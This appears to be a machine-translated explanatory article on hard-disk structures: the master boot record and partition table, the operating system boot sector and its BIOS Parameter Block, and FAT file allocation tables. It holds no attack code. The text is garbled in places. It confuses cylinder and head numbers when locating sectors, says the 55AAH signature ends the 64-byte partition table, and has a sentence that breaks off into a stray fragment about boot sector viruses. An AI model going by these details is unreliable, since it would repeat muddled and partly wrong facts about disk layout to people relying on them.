The main boot sector is located on track 0 cylinder 0 cylinder 1 sector of the entire hard disk, including the hard disk main boot record MBR (Main Boot Record) and partition table DPT (Disk Partition Table). The role of the master boot record is to check whether the partition table is correct and determine which partition is the boot partition, and transfer the startup program of the partition (that is, the operating system boot sector) to the memory for execution at the end of the program. As for the partition table, many people know that starting with 80H or 00H and ending with 55AAH, a total of 64 bytes, is located at the very end of the sector. It is worth mentioning that the MBR is generated by a partition program (such as Fdisk.exe for DOS), and this sector may be different for different operating systems. If you have this intention, you can write one yourself, as long as it can complete the aforementioned tasks, which is why you can achieve multi-system startup A lot of boot sector viruses).
Operating system boot sector
OBR (OS Boot Record) is the boot sector of the operating system, usually located on the 0 track 1 cylinder 1 sector of the hard disk (this is for DOS, for those systems that boot in multiple boot mode are located in the corresponding primary partition The first sector of the extended partition) is the first sector that the operating system can directly access. It also includes a boot program and a partition parameter record table called BPB (BIOS Parameter Block). In fact, each logical partition has an OBR, and its parameters vary depending on the size of the partition and the type of operating system. The main task of the boot program is to determine whether the first two files in the root directory of the partition are the boot files of the operating system (such as MSDOS or IO.SYS and MSDOS.SYS of Win9x / Me originating from MSDOS). If so, the first file is read into memory and control is given to the file. The BPB parameter block records the start sector, end sector, file storage format, hard disk media descriptor, root directory size, FAT number, size of allocation unit (also known as cluster) in the partition, etc. Important parameters. OBR is generated by an advanced formatter (eg Format.com for DOS).
File allocation table
FAT (File Allocation Table) is the file allocation table of DOS / Win9x system. For data security, FAT generally do two, the second FAT is the backup of the first FAT, the FAT area is immediately after the OBR , The size of which is determined by the size of the partition and the size of the file allocation unit. There are always many choices about the format of FAT. Microsoft's DOS and Windows use the familiar FAT12, FAT16 and FAT32 formats, but there is no other format of FAT other than this, like Windows NT, OS / 2, UNIX / Linux, Novell Etc. have their own file management methods.